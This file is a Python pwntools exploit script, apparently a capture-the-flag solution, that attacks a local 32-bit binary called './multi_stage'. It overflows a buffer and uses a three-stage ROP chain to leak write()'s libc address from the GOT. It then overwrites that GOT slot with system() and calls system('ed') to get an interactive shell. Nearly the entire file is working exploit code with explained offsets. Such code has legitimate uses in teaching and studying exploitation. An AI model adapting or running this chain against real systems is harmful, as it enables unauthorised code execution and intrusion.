#!/usr/bin/python


from pwn import *

# Offsets inside the libc that ./multi_stage loads. They are only valid for
# that exact libc build; on any other host they must be re-derived.
offset___libc_start_main_ret = 0x18e81
offset_system = 0x3d200
offset_dup2 = 0xe77c0
offset_read = 0xe6cb0
offset_write = 0xe6d80
offset_str_bin_sh = 0x17e0cf

# Addresses inside ./multi_stage, used as absolute values by the chain
# (so the binary is assumed to be loaded at a fixed, non-randomised base).
read_plt = 0x8048300        # read@plt stub
write_plt = 0x8048320       # write@plt stub
write_got = 0x804a014       # GOT slot that write@plt jumps through
new_system_plt = write_plt  # the same stub, once its GOT slot holds system()
ed_str = 0x8049243          # "ed" string in the binary, argument to system()
pppr = 0x8048529            # gadget that pops the three call args then rets
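def main():
    """Run the three-stage ROP chain against ./multi_stage and hand over a shell.

    Stage 1 leaks the resolved libc address of write() out of the GOT,
    stage 2 overwrites that GOT slot with system() (computed from the leak
    and the hard-coded libc offsets), and stage 3 calls write@plt -- which
    now resolves to system() -- with the in-binary "ed" string as argument.
    """
    p = process("./multi_stage")

    # Bytes literals so the concatenation with p32() works on Python 3 as
    # well as Python 2 (str + bytes raises TypeError on Python 3).
    payload = b"A" * 28  # filler up to the saved return address
    # 1. write(1, write_got, 4): leak write()'s resolved libc address
    payload += p32(write_plt)
    payload += p32(pppr)  # clean the three args, return into the next call
    payload += p32(1)  # STDOUT
    payload += p32(write_got)
    payload += p32(4)
    # 2. read(0, write_got, 4): overwrite write's GOT slot with system()
    payload += p32(read_plt)
    payload += p32(pppr)
    payload += p32(0)  # STDIN
    payload += p32(write_got)
    payload += p32(4)
    # 3. write@plt now goes to system(); call system("ed")
    payload += p32(new_system_plt)
    payload += p32(0xdeadbeef)  # return address of system(); never reached
    payload += p32(ed_str)

    p.send(payload)

    # Skip the target's own output ahead of the leak. recvn() blocks until
    # the full count has arrived, where recv() may return a short read and
    # shift the 4-byte leak below. NOTE(review): assumes exactly 16 bytes
    # precede the leak -- confirm against the binary's output.
    p.recvn(16)

    # Parse the leak: exactly the 4 bytes written by stage 1.
    leak = p.recvn(4)
    write_addr = u32(leak)
    log.info("write_addr: 0x%x" % write_addr)

    libc_base = write_addr - offset_write
    log.info("libc_base: 0x%x" % libc_base)
    # libc is mapped page-aligned; non-zero low 12 bits mean the leak was
    # mis-parsed or offset_write belongs to a different libc build.
    if libc_base & 0xfff:
        log.warning("libc_base 0x%x is not page-aligned; leak or offsets are wrong" % libc_base)

    system_addr = libc_base + offset_system
    log.info("system_addr: 0x%x" % system_addr)
    # Stage 2's read(0, write_got, 4) consumes exactly these 4 bytes.
    p.send(p32(system_addr))

    p.interactive()
    p.close()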


if __name__ == "__main__":
    # Only launch the exploit when run as a script, not when imported.
    main()
